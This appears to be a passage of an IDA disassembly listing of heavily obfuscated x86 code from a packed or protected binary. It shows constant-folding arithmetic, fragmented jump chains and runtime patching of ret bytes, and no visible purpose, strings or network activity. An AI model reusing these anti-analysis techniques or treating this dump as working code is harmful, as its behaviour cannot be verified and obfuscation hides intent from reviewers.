sub_441C8F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45341C
loc_441CA5: ; CODE XREF: sub_45341C:loc_4410ADj
sub al, 99h
push 1E0123A7h
xchg ebx, [esp+4+var_4]
; END OF FUNCTION CHUNK FOR sub_45341C
; START OF FUNCTION CHUNK FOR sub_43B7F7
loc_441CAF: ; CODE XREF: sub_43B7F7:loc_43F3ECj
mov edx, ebx
pop ebx
and edx, 0CB2B35C4h
xor edx, 2B5A3860h
jmp loc_43E504
; END OF FUNCTION CHUNK FOR sub_43B7F7
; ---------------------------------------------------------------------------
loc_441CC3: ; CODE XREF: ut7h7i2x:loc_44ED49j
and eax, 0D8E61B41h
loc_441CC9: ; CODE XREF: ut7h7i2x:loc_446DAFj
sbb esi, ebx
adc eax, ecx
jmp loc_44BCDA
; ---------------------------------------------------------------------------
loc_441CD2: ; CODE XREF: ut7h7i2x:004416E5j
jz loc_446426
jmp loc_44CA53
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_309. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_441CDE: ; CODE XREF: ut7h7i2x:loc_453F24j
jnz loc_4406AD
jmp loc_444B49
; ---------------------------------------------------------------------------
loc_441CE9: ; CODE XREF: ut7h7i2x:0044BFF0j
push 0A1869A46h
pop eax
xor eax, 3FE40E44h
and eax, 0B0DFF29Ch
xor eax, 7A76A46Fh
call sub_43AA94
jmp loc_455F6F
; ---------------------------------------------------------------------------
not esi
jmp loc_4595BC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_441D12: ; CODE XREF: sub_450FDE:loc_43E5EBj
mov esi, edx
pop edx
and esi, 0F208CF46h
add esi, 3D5930h
mov [esi], eax
jmp loc_44CF9C
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44937E
loc_441D28: ; CODE XREF: sub_44937E:loc_44D309j
; sub_457FDD+25j
call sub_453D8B
push 653E6F0Ah
loc_441D32: ; CODE XREF: sub_449CD5+4j
pop edx
and edx, 68D61171h
add edx, 0AF5FC970h
call sub_44ED9F
jmp loc_45422D
; END OF FUNCTION CHUNK FOR sub_44937E
; ---------------------------------------------------------------------------
loc_441D49: ; CODE XREF: ut7h7i2x:0045193Fj
shr edi, 15h
jno loc_44716E
sub ebx, 3F470072h
shr edi, 0Ah
; START OF FUNCTION CHUNK FOR sub_4471CA
loc_441D5B: ; CODE XREF: sub_4471CA+A763j
and edi, 0B371A7Eh
add edi, 0F5305A95h
jmp loc_43A164
; END OF FUNCTION CHUNK FOR sub_4471CA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44875F
loc_441D6C: ; CODE XREF: sub_44875F:loc_446D71j
pop eax
or eax, 98C49FADh
sub eax, 8427AC50h
add eax, 8A7672D3h
mov eax, [eax]
call sub_43C0DA
loc_441D86: ; CODE XREF: ut7h7i2x:0045AE20j
jmp loc_44F53E
; END OF FUNCTION CHUNK FOR sub_44875F
; ---------------------------------------------------------------------------
adc ebp, 46E4AB7Fh
xchg edi, [edx]
jmp sub_449FFC
; ---------------------------------------------------------------------------
jns sub_441878
jmp sub_44CAA4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444FDD
loc_441DA3: ; CODE XREF: sub_444FDD+10j
mov byte ptr [eax], 0C3h
jmp sub_442E16
; END OF FUNCTION CHUNK FOR sub_444FDD
; =============== S U B R O U T I N E =======================================
sub_441DAB proc near ; CODE XREF: sub_40B2BC+10Fp
; sub_40B2BC+126p ...
call sub_441DBB
jmp ds:off_41D140
sub_441DAB endp
; ---------------------------------------------------------------------------
loc_441DB6: ; CODE XREF: ut7h7i2x:0044169Cj
jmp loc_45894E
; =============== S U B R O U T I N E =======================================
sub_441DBB proc near ; CODE XREF: ut7h7i2x:loc_43BC7Bj
; sub_441DABp ...
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004580A4 SIZE 0000000F BYTES
call sub_44D5BE
loc_441DC0: ; CODE XREF: ut7h7i2x:0044A927j
jmp loc_4580A4
sub_441DBB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_441DC5: ; CODE XREF: ut7h7i2x:00444748j
jnz loc_441518
; START OF FUNCTION CHUNK FOR sub_444AA3
loc_441DCB: ; CODE XREF: sub_444AA3+117B4j
jmp sub_45499E
; END OF FUNCTION CHUNK FOR sub_444AA3
; ---------------------------------------------------------------------------
or esi, ecx
add edi, eax
jmp loc_441518
; ---------------------------------------------------------------------------
locret_441DD9: ; CODE XREF: ut7h7i2x:00453CAEj
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444851
loc_441DDA: ; CODE XREF: sub_444851-2D69j
jmp sub_44937E
; END OF FUNCTION CHUNK FOR sub_444851
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BFF8
loc_441DDF: ; CODE XREF: sub_43BFF8+9j
jmp loc_440763
; END OF FUNCTION CHUNK FOR sub_43BFF8
; ---------------------------------------------------------------------------
loc_441DE4: ; CODE XREF: ut7h7i2x:00447E87j
jl sub_44AAA2
sub esi, 5BD31377h
cmp eax, ebx
jmp loc_443532
; ---------------------------------------------------------------------------
not ebx
jmp sub_45742F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4408C2
loc_441DFE: ; CODE XREF: sub_4408C2+14j
jz loc_44450D
jmp loc_43B776
; END OF FUNCTION CHUNK FOR sub_4408C2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444851
loc_441E09: ; CODE XREF: sub_444851+13A48j
js loc_443684
test ecx, ebx
jmp loc_456EAA
; END OF FUNCTION CHUNK FOR sub_444851
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_441E16: ; CODE XREF: sub_457A66+235Dj
cmp al, 0A4h
jz loc_451E65
jmp loc_43E7C1
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
loc_441E23: ; DATA XREF: sub_4482D0+10B48o
push edx
push offset sub_45AC59
jmp loc_43E7BC
; ---------------------------------------------------------------------------
loc_441E2E: ; CODE XREF: ut7h7i2x:0045A81Aj
xchg ebx, edi
shl eax, 7
loc_441E33: ; CODE XREF: ut7h7i2x:loc_44E54Fj
mov eax, [ebp-0Ch]
push edx
mov edx, eax
xchg edx, [esp]
push edi
jmp loc_44CCF3
; ---------------------------------------------------------------------------
loc_441E42: ; CODE XREF: ut7h7i2x:0045724Fj
or ecx, 490A11F6h
add ecx, 0A6E8F261h
call sub_44B50D
; START OF FUNCTION CHUNK FOR sub_449B8E
loc_441E53: ; CODE XREF: sub_449B8E-74A1j
jmp nullsub_415
; END OF FUNCTION CHUNK FOR sub_449B8E
; ---------------------------------------------------------------------------
loc_441E58: ; CODE XREF: ut7h7i2x:loc_4426CEj
xor ebx, ebp
jo sub_44C791
jmp loc_44D3C4
; ---------------------------------------------------------------------------
sbb ecx, ebp
jmp loc_448F2F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452814
loc_441E6C: ; CODE XREF: sub_452814+Ej
and eax, 2BEF200Fh
jns loc_44B1D3
xor ebx, 0A391EA7Dh
jno loc_458608
; END OF FUNCTION CHUNK FOR sub_452814
; START OF FUNCTION CHUNK FOR sub_443A45
loc_441E84: ; CODE XREF: sub_443A45+D914j
jmp loc_44B1D3
; END OF FUNCTION CHUNK FOR sub_443A45
; ---------------------------------------------------------------------------
add eax, ebp
jb loc_458BF5
jmp sub_43F094
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4580CF
loc_441E96: ; CODE XREF: sub_4580CF:loc_44A69Aj
mov ebp, esp
push offset sub_43EDA4
jmp loc_44B846
; END OF FUNCTION CHUNK FOR sub_4580CF
; ---------------------------------------------------------------------------
loc_441EA2: ; CODE XREF: ut7h7i2x:004550D8j
popf
jmp loc_44D5BC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E6B4
loc_441EA8: ; CODE XREF: sub_44E6B4-85DBj
jz loc_446913
jmp loc_43C976
; END OF FUNCTION CHUNK FOR sub_44E6B4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445235
loc_441EB3: ; CODE XREF: sub_445235+E6A2j
xor eax, 2271B966h
; END OF FUNCTION CHUNK FOR sub_445235
; START OF FUNCTION CHUNK FOR sub_44AA54
loc_441EB9: ; CODE XREF: sub_44AA54:loc_439873j
; ut7h7i2x:loc_441888j ...
jmp loc_441883
; END OF FUNCTION CHUNK FOR sub_44AA54
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445235
loc_441EBE: ; CODE XREF: sub_445235+Aj
; ut7h7i2x:004539B3j
pop ecx
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_445235
; ---------------------------------------------------------------------------
loc_441EC1: ; CODE XREF: ut7h7i2x:004530D9j
jmp loc_4443BE
; =============== S U B R O U T I N E =======================================
sub_441EC6 proc near ; CODE XREF: sub_4463D6+268Bp
; ut7h7i2x:0044B4FDp ...
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0044239F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442E40 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AE42 SIZE 00000012 BYTES
push edx
jmp loc_442E40
sub_441EC6 endp
; ---------------------------------------------------------------------------
loc_441ECC: ; CODE XREF: ut7h7i2x:0045A16Bj
pop esi
; START OF FUNCTION CHUNK FOR sub_43FCEE
loc_441ECD: ; CODE XREF: sub_43FCEE:loc_4430EFj
xor esi, 1EC1FF6Dh
add esi, 0F69F59CDh
or esi, ds:4000F5h
sub esi, 9FD06BBAh
jnz loc_453A6A
cdq
jmp loc_44563C
; END OF FUNCTION CHUNK FOR sub_43FCEE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DD17
loc_441EF1: ; CODE XREF: sub_43DD17+1C334j
rol edx, 16h
xor edx, 0E762136Bh
cmp edx, 0FF19A7E5h
jmp loc_440209
; END OF FUNCTION CHUNK FOR sub_43DD17
; ---------------------------------------------------------------------------
or ebx, 0F2BB9C32h
jmp sub_444FDD
; =============== S U B R O U T I N E =======================================
sub_441F10 proc near ; CODE XREF: sub_43B106+5p
; ut7h7i2x:00441703j
xchg esi, [esp+0]
pop esi
call sub_44ED9F
push eax
ror eax, 0Eh
mov ds:dword_43A7BC, eax
retn
sub_441F10 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449B8E
loc_441F24: ; CODE XREF: sub_449B8E+D15Dj
jmp nullsub_272
; END OF FUNCTION CHUNK FOR sub_449B8E
; ---------------------------------------------------------------------------
loc_441F29: ; CODE XREF: ut7h7i2x:00451ED4j
jmp loc_45109A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452C66
loc_441F2E: ; CODE XREF: sub_452C66-10130j
jmp loc_457770
; END OF FUNCTION CHUNK FOR sub_452C66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456B6D
loc_441F33: ; CODE XREF: sub_456B6D-1841Aj
mov eax, [eax]
push offset loc_4421A4
jmp nullsub_367
; END OF FUNCTION CHUNK FOR sub_456B6D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_441F3F: ; CODE XREF: sub_43A556+12E2Aj
add ebx, 4C03C773h
xchg ebp, ebx
not edx
loc_441F49: ; CODE XREF: sub_44081E+4j
; sub_43A556:loc_445540j ...
jz loc_44030B
cmp dword ptr [ebp-4], 4
jnz loc_43EE42
jmp loc_44BBC9
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A513
loc_441F5E: ; CODE XREF: sub_43A513+6B8Aj
adc ecx, 2C74FA85h
jmp loc_43B248
; END OF FUNCTION CHUNK FOR sub_43A513
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459DE7
loc_441F69: ; CODE XREF: sub_459DE7:loc_44B30Bj
; sub_459DE7-B109j
push ecx
push 9BFCC86h
pop ecx
xor ecx, 0FA6DFA59h
or ecx, ds:4000F0h
add ecx, 717799h
jmp loc_43AF25
; END OF FUNCTION CHUNK FOR sub_459DE7
; ---------------------------------------------------------------------------
loc_441F87: ; CODE XREF: ut7h7i2x:004444C6j
or eax, ebp
; START OF FUNCTION CHUNK FOR sub_43C1E5
loc_441F89: ; CODE XREF: sub_43C1E5:loc_4444B9j
xor eax, 7007C50Bh
add eax, 0D6911942h
add eax, ebp
add eax, 8AD47183h
jmp loc_459289
; END OF FUNCTION CHUNK FOR sub_43C1E5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441AED
loc_441FA2: ; CODE XREF: sub_441AED+181E9j
rol eax, 16h
push eax
call sub_454196
retn
; END OF FUNCTION CHUNK FOR sub_441AED
; =============== S U B R O U T I N E =======================================
sub_441FAC proc near ; CODE XREF: ut7h7i2x:004449ACj
; sub_454C20+Cp
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0044C75A SIZE 0000000D BYTES
push ecx
mov ecx, ebp
jmp loc_44C75A
sub_441FAC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4518D7
loc_441FB4: ; CODE XREF: sub_4518D7:loc_43F0CBj
; ut7h7i2x:0044FD49j
call sub_458E89
loc_441FB9: ; CODE XREF: ut7h7i2x:0044DC22j
pop edi
xor esi, 0DDB156C5h
or esi, 11915C78h
add esi, 8D703Ch
jmp loc_443B70
; END OF FUNCTION CHUNK FOR sub_4518D7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_441FD1: ; CODE XREF: sub_439BF8+20304j
xor edx, edx
div ecx
; END OF FUNCTION CHUNK FOR sub_439BF8
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_441FD5: ; CODE XREF: sub_45A79F:loc_43EE6Ej
; sub_43AB62:loc_4518E6j
mov [ebp-20h], edx
mov ecx, [ebp-14h]
push eax
jmp loc_43E93A
; END OF FUNCTION CHUNK FOR sub_43AB62
; =============== S U B R O U T I N E =======================================
sub_441FE1 proc near ; CODE XREF: sub_453A91-4348p
; ut7h7i2x:00457FA0j
arg_0 = dword ptr 4
xchg edx, [esp+0]
pop edx
add ebx, 0CC09891Eh
xchg ebx, [esp-4+arg_0]
jmp sub_43F3D1
sub_441FE1 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_441FF3: ; CODE XREF: sub_450FDE:loc_44401Ej
xor eax, 182B2A54h
ror eax, 1Dh
xor eax, 0B9154B32h
mov edx, [esp-8+arg_4]
call sub_44305D
; END OF FUNCTION CHUNK FOR sub_450FDE
; START OF FUNCTION CHUNK FOR sub_443BC5
loc_44200A: ; CODE XREF: sub_443BC5+100B8j
jmp sub_4594B7
; END OF FUNCTION CHUNK FOR sub_443BC5
; ---------------------------------------------------------------------------
loc_44200F: ; CODE XREF: ut7h7i2x:00450AE9j
jmp loc_459B1E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4406F1
loc_442014: ; CODE XREF: sub_4406F1+109BAj
jo loc_43F253
pop ebx
xor eax, 0D71BDD43h
loc_442021: ; CODE XREF: sub_4406F1:loc_456C7Aj
and edx, 281D4EF9h
add edx, 0F835C727h
mov [edx], eax
jmp loc_454165
; END OF FUNCTION CHUNK FOR sub_4406F1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44BDF1
loc_442034: ; CODE XREF: ut7h7i2x:00445020j
; sub_44BDF1:loc_448747j
xor eax, 372B0C4Ch
and eax, 747AD6E4h
xor eax, 34CC3877h
add eax, ebp
add eax, 0DB23C735h
jmp loc_44A23B
; END OF FUNCTION CHUNK FOR sub_44BDF1
; ---------------------------------------------------------------------------
loc_442053: ; CODE XREF: ut7h7i2x:0045A11Aj
jle sub_447DDB
or ecx, esi
jmp loc_451C2F
; ---------------------------------------------------------------------------
loc_442060: ; CODE XREF: ut7h7i2x:loc_44A874j
lea eax, loc_452FA0
mov byte ptr [eax], 0C3h
jmp loc_44A193
; ---------------------------------------------------------------------------
call nullsub_22
jmp ds:dword_41D058
; ---------------------------------------------------------------------------
loc_442079: ; DATA XREF: sub_44F57E:loc_455069o
adc ecx, eax
push ecx
push 841056C0h
pop ecx
jmp loc_440680
; ---------------------------------------------------------------------------
or eax, eax
jnz loc_440901
jmp loc_43B809
; ---------------------------------------------------------------------------
loc_442094: ; CODE XREF: ut7h7i2x:004509B5j
add eax, edx
; =============== S U B R O U T I N E =======================================
sub_442096 proc near ; CODE XREF: ut7h7i2x:loc_44EF55p
; FUNCTION CHUNK AT 0043F789 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045616C SIZE 0000000A BYTES
xchg esi, [esp+0]
pop esi
mov edx, 0B9726E5Ah
call sub_44ED9F
jmp loc_43F789
sub_442096 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
test edx, 0D3425710h
jmp loc_4502EA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A33F
loc_4420B4: ; CODE XREF: sub_44A33F+16j
lea eax, [ebp-20h]
push eax
push edx
push 6B37CFF7h
pop edx
or edx, 90D71B7Ch
sub edx, 0A262A05Ah
cmp edx, 0AC47A035h
jmp loc_459EA8
; END OF FUNCTION CHUNK FOR sub_44A33F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_353. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4417AF
loc_4420D7: ; CODE XREF: sub_4417AF+BCB8j
jmp loc_43E50E
; END OF FUNCTION CHUNK FOR sub_4417AF
; =============== S U B R O U T I N E =======================================
sub_4420DC proc near ; DATA XREF: sub_43918A+1o
push eax
mov edx, eax
push esi
push offset loc_43BC5A
jmp nullsub_484
sub_4420DC endp
; ---------------------------------------------------------------------------
loc_4420EA: ; CODE XREF: ut7h7i2x:00441A68j
js loc_45183E
xchg ebx, edi
mov edx, ecx
sub eax, esi
jmp loc_455938
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DD56
loc_4420FB: ; CODE XREF: sub_44DD56:loc_453436j
jz loc_4498C6
or edi, 39CF4961h
jmp loc_4498C5
; END OF FUNCTION CHUNK FOR sub_44DD56
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E96
loc_44210C: ; CODE XREF: sub_449E96-4262j
mov eax, [eax]
mov al, [eax]
mov edx, [ebp-28h]
mov [edx], al
inc dword ptr [ebp-28h]
mov eax, [ebp-24h]
loc_44211B: ; CODE XREF: ut7h7i2x:loc_440026j
cmp byte ptr [eax], 2Eh
jnz loc_452AF3
jmp loc_44D91B
; END OF FUNCTION CHUNK FOR sub_449E96
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_534. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44185C
loc_44212A: ; CODE XREF: sub_44185C:loc_44185Dj
push 24E49D6Bh
pop edx
or edx, 0DB3E8AB4h
push offset loc_43DF38
jmp nullsub_43
; END OF FUNCTION CHUNK FOR sub_44185C
; ---------------------------------------------------------------------------
loc_442140: ; CODE XREF: ut7h7i2x:loc_439EDBj
; ut7h7i2x:00439EF4j
add eax, 5614B753h
push edi
push offset sub_451971
jmp locret_44F330
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_338. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_442152: ; CODE XREF: sub_43A556+13FF4j
jge loc_453EE2
loc_442158: ; CODE XREF: sub_43B9B1+18013j
jmp loc_44A268
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
and ecx, eax
jmp loc_453EDB
; ---------------------------------------------------------------------------
loc_442164: ; CODE XREF: ut7h7i2x:loc_447854j
pop edi
and edi, 4BD4788Eh
add edi, 7EAF5ABAh
or edi, 35E89444h
cmp edi, 92AE98EFh
jmp loc_43DE0E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E688
loc_442182: ; CODE XREF: sub_44E688:loc_452412j
sub esi, 66BA9A55h
test esi, 800000h
jmp loc_445C57
; END OF FUNCTION CHUNK FOR sub_44E688
; ---------------------------------------------------------------------------
sub ebp, 0CEA69620h
sub ecx, 98ABD9FEh
jmp sub_445401
; ---------------------------------------------------------------------------
loc_4421A4: ; DATA XREF: sub_456B6D-14C38o
push eax
call sub_440493
push eax
push ebx
push 2DC8A384h
or ebx, edi
jmp loc_43CD85
; ---------------------------------------------------------------------------
loc_4421B8: ; DATA XREF: ut7h7i2x:00457A84o
push 67318D68h
pop eax
add eax, 6D4EDCAFh
xor eax, 47A7F07h
add eax, 2F4A0213h
xchg eax, [esp]
jmp nullsub_511
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C1E5
loc_4421D8: ; CODE XREF: sub_43C1E5:loc_444847j
ror edi, 18h
sbb eax, edi
jmp loc_454526
; END OF FUNCTION CHUNK FOR sub_43C1E5
; ---------------------------------------------------------------------------
shr ebx, 18h
jmp sub_459653
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_4421EA: ; CODE XREF: sub_439BF8+2046j
mov edx, eax
push esi
push 5454AF50h
pop esi
and esi, 3E173708h
test esi, 40000h
jmp loc_456862
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E6B4
loc_442204: ; CODE XREF: sub_44E6B4+366Ej
sub edi, ecx
loc_442206: ; CODE XREF: sub_44E6B4:loc_44811Aj
push 0F0D7A55Bh
pop eax
add eax, 3581756Fh
xor eax, 95AF741h
loc_442218: ; CODE XREF: ut7h7i2x:0044A85Aj
add eax, ebp
add eax, 0D0FC1271h
jmp loc_441C64
; END OF FUNCTION CHUNK FOR sub_44E6B4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456B5E
loc_442225: ; CODE XREF: sub_456B5E:loc_451F24j
jb loc_45A5AA
loc_44222B: ; CODE XREF: ut7h7i2x:004526CEj
jmp nullsub_41
; END OF FUNCTION CHUNK FOR sub_456B5E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43ADDB
loc_442230: ; CODE XREF: sub_43ADDB+1291Dj
jmp loc_452668
; END OF FUNCTION CHUNK FOR sub_43ADDB
; ---------------------------------------------------------------------------
jl loc_444EAF
mov ebx, esi
jmp loc_45A5A4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_66. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C8F3
loc_442243: ; CODE XREF: sub_44C8F3-DA4Bj
jmp loc_444309
; END OF FUNCTION CHUNK FOR sub_44C8F3
; ---------------------------------------------------------------------------
mov ebx, 962CDC9h
jmp loc_446027
; =============== S U B R O U T I N E =======================================
sub_442252 proc near ; CODE XREF: sub_44CAA4+2CC6p
; ut7h7i2x:00450042j
xchg eax, [esp+0]
pop eax
call sub_442262
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
sub_442252 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_442262 proc near ; CODE XREF: sub_442252+4p
; sub_43E592+8CA6p ...
; FUNCTION CHUNK AT 0044D0C2 SIZE 00000005 BYTES
mov dword ptr [eax], 0
loc_442268: ; CODE XREF: ut7h7i2x:loc_44BC06j
jmp loc_44D0C2
sub_442262 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449D60
loc_44226D: ; CODE XREF: sub_449D60+1DF5j
not edx
loc_44226F: ; CODE XREF: sub_449D60:loc_444870j
call sub_4587DD
mov edx, 0B70DD039h
call sub_44ED9F
push eax
ror eax, 19h
push offset loc_44F6D7
loc_442287: ; CODE XREF: ut7h7i2x:0044E616j
jmp loc_442CFC
; END OF FUNCTION CHUNK FOR sub_449D60
; ---------------------------------------------------------------------------
loc_44228C: ; CODE XREF: ut7h7i2x:00454576j
xchg ecx, edi
pushf
mov ebx, 0E7943858h
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_442294: ; CODE XREF: sub_450FDE+3584j
xor ebx, 5FE3E46Bh
add ebx, ebp
add ebx, 5BE386DCh
mov [ebx], eax
jmp loc_445841
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B789
loc_4422A9: ; CODE XREF: sub_4549F0-1B2CCj
; sub_44B789:loc_44AA4Ej
jz loc_4564A2
loc_4422AF: ; CODE XREF: sub_446F9A+CF05j
jmp loc_43B207
; END OF FUNCTION CHUNK FOR sub_44B789
; ---------------------------------------------------------------------------
cmp eax, 8CC935C2h
jmp loc_451100
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_306. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456DB3
loc_4422C0: ; CODE XREF: sub_456DB3+12j
jmp loc_44FEA0
; END OF FUNCTION CHUNK FOR sub_456DB3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B98B
loc_4422C5: ; CODE XREF: sub_44B98B+16j
push 3F2B32BAh
xchg ecx, [esp+4+var_4]
mov edx, ecx
pop ecx
add edx, 91A75F61h
jmp loc_43D150
; END OF FUNCTION CHUNK FOR sub_44B98B
; ---------------------------------------------------------------------------
loc_4422DB: ; CODE XREF: ut7h7i2x:loc_457C5Fj
ror eax, 1Bh
push edx
push 3ACBBEC8h
pop edx
sub edx, 5D4A2A7Dh
jmp loc_4549BA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449700
loc_4422F0: ; CODE XREF: sub_449700:loc_4402F1j
mov ecx, eax
jmp loc_44B41A
; END OF FUNCTION CHUNK FOR sub_449700
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CE09
loc_4422F8: ; CODE XREF: sub_44CE09-486j
jmp loc_43F000
; END OF FUNCTION CHUNK FOR sub_44CE09
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CDBA
loc_4422FD: ; CODE XREF: sub_43CDBA+BA9Bj
jmp loc_456748
; END OF FUNCTION CHUNK FOR sub_43CDBA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A0CE
loc_442302: ; CODE XREF: sub_44A0CE+13j
sub eax, 15F1D50Bh
xor eax, 4FF65363h
mov edx, [esp-4+arg_0]
push edx
mov edx, eax
jmp loc_450F6E
; END OF FUNCTION CHUNK FOR sub_44A0CE
; =============== S U B R O U T I N E =======================================
sub_442319 proc near ; CODE XREF: ut7h7i2x:0043A846j
; sub_43EDD8:loc_44981Fp
xchg eax, [esp+0]
pop eax
add eax, 2E976991h
call sub_44386D
sub_442319 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_445FA9
loc_442328: ; CODE XREF: sub_445FA9:loc_4517ABj
push edx
push esi
mov esi, eax
xchg esi, [esp+8+var_8]
push 9441B47Ch
pop eax
jmp loc_458B4E
; END OF FUNCTION CHUNK FOR sub_445FA9
; ---------------------------------------------------------------------------
add ebx, ebp
add ebx, edi
jmp sub_44AAC7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45967C
loc_442343: ; CODE XREF: sub_45967C-16506j
and esi, 51CF1773h
sub esi, ecx
loc_44234B: ; CODE XREF: sub_45967C:loc_4556C9j
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
jnz loc_453CFA
jmp loc_440CB7
; END OF FUNCTION CHUNK FOR sub_45967C
; ---------------------------------------------------------------------------
loc_44235C: ; DATA XREF: sub_449B76-4D05o
push 0D7479F53h
pop eax
add eax, 3C848FE2h
sub eax, ds:4000F8h
test eax, 4000h
jmp loc_44375E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452B14
loc_442379: ; CODE XREF: sub_452B14:loc_43A3FAj
jl loc_458320
test edx, eax
jmp loc_439772
; END OF FUNCTION CHUNK FOR sub_452B14
; ---------------------------------------------------------------------------
loc_442386: ; CODE XREF: ut7h7i2x:loc_452C9Bj
xor edx, 0F51E1D40h
adc esi, edi
jmp loc_44898E
; ---------------------------------------------------------------------------
or edx, 5AD1E4F5h
jmp sub_4563CB
; ---------------------------------------------------------------------------
locret_44239E: ; CODE XREF: ut7h7i2x:00457917j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_441EC6
loc_44239F: ; CODE XREF: sub_441EC6+18F89j
jmp loc_4587A6
; END OF FUNCTION CHUNK FOR sub_441EC6
; ---------------------------------------------------------------------------
loc_4423A4: ; CODE XREF: ut7h7i2x:0045133Bj
jmp loc_43974A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AE1A
loc_4423A9: ; CODE XREF: sub_43AE1A+15E18j
jmp loc_44F015
; END OF FUNCTION CHUNK FOR sub_43AE1A
; =============== S U B R O U T I N E =======================================
sub_4423AE proc near ; DATA XREF: ut7h7i2x:00445E83o
var_C = dword ptr -0Ch
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0044046E SIZE 00000013 BYTES
push edi
pushf
push 6F0AD2Ch
